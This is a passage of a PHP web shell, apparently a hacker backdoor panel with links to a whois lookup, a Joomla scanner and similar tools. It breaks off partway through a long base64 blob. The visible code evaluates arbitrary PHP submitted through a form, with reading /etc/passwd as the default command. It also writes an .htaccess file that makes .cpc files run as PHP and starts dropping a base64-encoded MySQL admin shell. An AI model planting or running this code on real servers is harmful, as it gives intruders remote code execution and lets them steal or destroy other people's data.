?>&amp;x=hashid">Hash ID</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tutor">Tutorial & Ebook</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>\r\n<a href="?<?php echo "y=".$pwd;\t?>&amp;x=logout">Log-Out</a>\r\n\r\n\r\n</div></center>\r\n<!-- menu end -->\r\n\r\n<?php\r\n@ini_set(\'display_errors\', 0);\r\nif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="cmd" id="cmd">\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo eval(magicboom($_POST[\'cmd\']));\r\n}\r\nelse echo "echo file_get_contents(\'/etc/passwd\');";\r\n?>\r\n</textarea>\r\n<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>\r\n</table>\r\n</form>\r\n\r\n<?php } \r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sql\'))\r\n    {\r\n    ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";\r\n  mkdir(\'mysql\', 0755);\r\n    chdir(\'mysql\');\r\n        $akses = ".htaccess";\r\n        $buka_lah = "$akses";\r\n        $buka = fopen ($buka_lah , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-php .cpc\r\n";    \r\n        fwrite ( $buka , $metin ) ;\r\n        fclose ($buka);\r\n$sqlshell = \'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBh